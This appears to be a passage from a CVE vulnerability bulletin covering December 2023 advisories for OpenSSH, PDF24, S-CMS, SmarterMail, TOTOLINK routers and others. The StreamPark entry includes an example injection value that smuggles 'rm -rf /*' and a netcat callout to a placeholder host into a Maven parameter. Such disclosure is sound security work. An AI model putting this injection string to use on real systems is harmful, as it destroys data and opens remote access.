openssh -- opensshThe SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH's use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, libssh2 through 1.11.0, Thorn Tech SFTP Gateway before 3.4.6, Tera Term before 5.1, Paramiko before 3.4.0, jsch before 0.2.15, SFTPGo before 2.5.6, Netgate pfSense Plus through 23.09.1, Netgate pfSense CE through 2.7.2, HPN-SSH through 18.2.0, ProFTPD before 1.3.8b (and before 1.3.9rc2), ORYX CycloneSSH before 2.3.4, NetSarang XShell 7 before Build 0144, CrushFTP before 10.6.0, ConnectBot SSH library before 2.2.22, Apache MINA sshd through 2.11.0, sshj through 0.37.0, TinySSH through 20230101, trilead-ssh2 6401, LANCOM LCOS and LANconfig, FileZilla before 3.66.4, Nova before 11.8, PKIX-SSH before 14.4, SecureCRT before 9.4.3, Transmit5 before 5.10.4, Win32-OpenSSH before 9.5.0.0p1-Beta, WinSCP before 6.2.2, Bitvise SSH Server before 9.32, Bitvise SSH Client before 9.33, KiTTY through 0.76.1.13, the net-ssh gem 7.2.0 for Ruby, the mscdex ssh2 module before 1.15.0 for Node.js, the thrussh library before 0.35.1 for Rust, and the Russh crate before 0.40.2 for Rust.2023-12-18not yet calculatedCVE-2023-48795
cve@mitre.org
pdf24_creator -- pdf24_creatorAn issue was discovered in PDF24 Creator 11.14.0. The configuration of the msi installer file was found to produce a visible cmd.exe window when using the repair function of msiexec.exe. This allows an unprivileged local attacker to use a chain of actions (e.g., an oplock on faxPrnInst.log) to open a SYSTEM cmd.exe.2023-12-19not yet calculatedCVE-2023-49147
cve@mitre.org
phpsysinfo -- phpsysinfoCross Site Request Forgery (CSRF) vulnerability in Phpsysinfo version 3.4.3 allows a remote attacker to obtain sensitive information via a crafted page in the XML.php file.2023-12-19not yet calculatedCVE-2023-49006
cve@mitre.org
proftpd -- proftpdmake_ftp_cmd in main.c in ProFTPD before 1.3.8a has a one-byte out-of-bounds read, and daemon crash, because of mishandling of quote/backslash semantics.2023-12-22not yet calculatedCVE-2023-51713
cve@mitre.org
qbit-matui -- qbit-matuiCross-Site Scripting (XSS) vulnerability in bill-ahmed qbit-matUI version 1.16.4, allows remote attackers to obtain sensitive information via fixed session identifiers (SID) in index.js file.2023-12-21not yet calculatedCVE-2023-50473
cve@mitre.org
ruijie -- ws6008Ruijie WS6008 v1.x v2.x AC_RGOS11.9(6)W3B2_G2C6-01_10221911 and WS6108 v1.x AC_RGOS11.9(6)W3B2_G2C6-01_10221911 was discovered to contain a command injection vulnerability via the function downFiles.2023-12-20not yet calculatedCVE-2023-50993
cve@mitre.org
s-cms -- s-cmsS-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_newsauth parameter at /admin/ajax.php.2023-12-21not yet calculatedCVE-2023-51048
cve@mitre.org
s-cms -- s-cmsS-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_bbsauth parameter at /admin/ajax.php.2023-12-21not yet calculatedCVE-2023-51049
cve@mitre.org
s-cms -- s-cmsS-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_productauth parameter at /admin/ajax.php.2023-12-21not yet calculatedCVE-2023-51050
cve@mitre.org
s-cms -- s-cmsS-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_textauth parameter at /admin/ajax.php.2023-12-21not yet calculatedCVE-2023-51051
cve@mitre.org
s-cms -- s-cmsS-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_formauth parameter at /admin/ajax.php.2023-12-21not yet calculatedCVE-2023-51052
cve@mitre.org
smartertools -- smartermailSmarterTools SmarterMail 8495 through 8664 before 8747 allows stored XSS by using image/svg+xml and an uploaded SVG document. This occurs because the application tries to allow youtube.com URLs, but actually allows youtube.com followed by an @ character and an attacker-controlled domain name.2023-12-21not yet calculatedCVE-2023-48114
cve@mitre.org
smartertools -- smartermailSmarterTools SmarterMail 8495 through 8664 before 8747 allows stored DOM XSS because an XSS protection mechanism is skipped when messageHTML and messagePlainText are set in the same request.2023-12-21not yet calculatedCVE-2023-48115
cve@mitre.org
smartertools -- smartermailSmarterTools SmarterMail 8495 through 8664 before 8747 allows stored XSS via a crafted description of a Calendar appointment.2023-12-21not yet calculatedCVE-2023-48116
cve@mitre.org
softing -- edgeaggregatorSofting edgeAggregator Restore Configuration Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Softing edgeAggregator. Authentication is required to exploit this vulnerability. The specific flaw exists within the processing of backup zip files. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this to execute code in the context of root. Was ZDI-CAN-20543.2023-12-19not yet calculatedCVE-2023-38126
zdi-disclosures@trendmicro.com
stormshield_network_security -- stormshield_network_securityAn issue was discovered in Stormshield Network Security (SNS) 3.7.0 through 3.7.39, 3.11.0 through 3.11.27, 4.3.0 through 4.3.22, 4.6.0 through 4.6.9, and 4.7.0 through 4.7.1. It's possible to know if a specific user account exists on the SNS firewall by using remote access commands.2023-12-21not yet calculatedCVE-2023-41166
cve@mitre.org
stormshield_network_security -- stormshield_network_securityAn issue was discovered in Stormshield Network Security (SNS) 4.0.0 through 4.3.21, 4.4.0 through 4.6.8, and 4.7.0. Sending a crafted ICMP packet may lead to a crash of the ASQ engine.2023-12-21not yet calculatedCVE-2023-47093
cve@mitre.org
streampark -- streamparkIn streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven, allowing attackers to insert commands for remote command execution. The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Mitigation: all users should upgrade to 2.1.2. Example: ##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use "||" or "&&": /usr/share/java/maven-3/conf/settings.xml || rm -rf /* /usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &2023-12-15not yet calculatedCVE-2023-49898
security@apache.org
sudo -- sudoSudo before 1.9.15 might allow row hammer attacks (for authentication bypass or privilege escalation) because application logic sometimes is based on not equaling an error value (instead of equaling a success value), and because the values do not resist flips of a single bit.2023-12-22not yet calculatedCVE-2023-42465
cve@mitre.org
thirty_bees -- thirty_beesA stored cross-site scripting (XSS) vulnerability in the component admin/AdminRequestSqlController.php of thirty bees before 1.5.0 allows attackers to execute arbitrary web script or HTML via $e->getMessage() error mishandling.2023-12-22not yet calculatedCVE-2023-45957
cve@mitre.org
totolink -- a3700rThere is an arbitrary command execution vulnerability in the setDiagnosisCfg function of the cstecgi.cgi of the TOTOlink A3700R router device in its firmware version V9.1.2u.5822_B20200513.2023-12-22not yet calculatedCVE-2023-50147
cve@mitre.org
totolink -- ex1200lTOTOlink EX1200L V9.3.5u.6146_B20201023 is vulnerable to arbitrary command execution via the cstecgi.cgi setOpModeCfg interface.2023-12-22not yet calculatedCVE-2023-51033
cve@mitre.org
totolink -- ex1200lTOTOlink EX1200L V9.3.5u.6146_B20201023 is vulnerable to arbitrary command execution via the cstecgi.cgi UploadFirmwareFile interface.2023-12-22not yet calculatedCVE-2023-51034
cve@mitre.org
totolink -- ex1200lTOTOLINK EX1200L V9.3.5u.6146_B20201023 is vulnerable to arbitrary command execution on the cstecgi.cgi NTPSyncWithHost interface.2023-12-22not yet calculatedCVE-2023-51035
cve@mitre.org
totolink -- ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the 'lanPriDns' parameter of the setLanConfig interface of the cstecgi.cgi.2023-12-22not yet calculatedCVE-2023-51011
cve@mitre.org
totolink -- ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the 'lanGateway' parameter of the setLanConfig interface of the cstecgi.cgi.2023-12-22not yet calculatedCVE-2023-51012
cve@mitre.org
totolink -- ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the 'lanNetmask' parameter of the setLanConfig interface of the cstecgi.cgi.2023-12-22not yet calculatedCVE-2023-51013
cve@mitre.org
totolink -- ex1800tTOTOLINK EX1800T V9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the 'lanSecDns' parameter of the setLanConfig interface of the cstecgi.cgi.2023-12-22not yet calculatedCVE-2023-51014
cve@mitre.org
totolink -- ex1800tTOTOLINK EX1800T v9.1.0cu.2112_B20220316 is vulnerable to arbitrary command execution in the 'enable' parameter of the setDmzCfg interface of the cstecgi.cgi.2023-12-22not yet calculatedCVE-2023-51015
cve@mitre.org
totolink -- ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the setRebootScheCfg interface of the cstecgi.cgi.2023-12-22not yet calculatedCVE-2023-51016
cve@mitre.org
totolink -- ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the 'lanIp' parameter of the setLanConfig interface of the cstecgi.cgi.2023-12-22not yet calculatedCVE-2023-51017
cve@mitre.org
totolink -- ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the 'opmode' parameter of the setWiFiApConfig interface of the cstecgi.cgi.2023-12-22not yet calculatedCVE-2023-51018
cve@mitre.org
totolink -- ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the 'key5g' parameter of the setWiFiExtenderConfig interface of the cstecgi.cgi.2023-12-22not yet calculatedCVE-2023-51019
cve@mitre.org
totolink -- ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the 'langType' parameter of the setLanguageCfg interface of the cstecgi.cgi.2023-12-22not yet calculatedCVE-2023-51020
cve@mitre.org
totolink -- ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the 'merge' parameter of the setRptWizardCfg interface of the cstecgi.cgi.2023-12-22not yet calculatedCVE-2023-51021
cve@mitre.org
totolink -- ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the 'langFlag' parameter of the setLanguageCfg interface of the cstecgi.cgi.2023-12-22not yet calculatedCVE-2023-51022
cve@mitre.org
totolink -- ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to arbitrary command execution in the 'host_time' parameter of the NTPSyncWithHost interface of the cstecgi.cgi.2023-12-22not yet calculatedCVE-2023-51023
cve@mitre.org
totolink -- ex1800tTOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the 'tz' parameter of the setNtpCfg interface of the cstecgi.cgi.2023-12-22not yet calculatedCVE-2023-51024
cve@mitre.org
totolink -- ex1800tTOTOlink EX1800T V9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the 'admuser' parameter of the setPasswordCfg interface of the cstecgi.cgi.2023-12-22not yet calculatedCVE-2023-51025
cve@mitre.org
totolink -- ex1800tTOTOlink EX1800T V9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the 'hour' parameter of the setRebootScheCfg interface of the cstecgi.cgi.2023-12-22not yet calculatedCVE-2023-51026
cve@mitre.org
totolink -- ex1800tTOTOlink EX1800T V9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the 'apcliAuthMode' parameter of the setWiFiExtenderConfig interface of the cstecgi.cgi.2023-12-22not yet calculatedCVE-2023-51027
cve@mitre.org
totolink -- ex1800tTOTOLINK EX1800T 9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the apcliChannel parameter of the setWiFiExtenderConfig interface of the cstecgi.cgi.2023-12-22not yet calculatedCVE-2023-51028
cve@mitre.org
weintek -- cmt2078x_easywebAn authenticated command injection vulnerability in Weintek cMT2078X easyweb Web Version v2.1.3, OS v20220215 allows attackers to execute arbitrary code or access sensitive information via injecting a crafted payload into the HMI Name parameter.2023-12-19not yet calculatedCVE-2023-50466
cve@mitre.org
windows -- multiple_productsAn issue discovered in TheGreenBow Windows Enterprise Certified VPN Client 6.52, Windows Standard VPN Client 6.87, and Windows Enterprise VPN Client 6.87 allows attackers to gain escalated privileges via crafted changes to memory mapped file.2023-12-19not yet calculatedCVE-2023-47267
cve@mitre.org
xpand_it -- write-back_managerXpand IT Write-back Manager v2.3.1 uses weak secret keys to sign JWT tokens. This allows attackers to easily obtain the secret key used to sign JWT tokens via a bruteforce attack.2023-12-20not yet calculatedCVE-2023-27172
cve@mitre.org
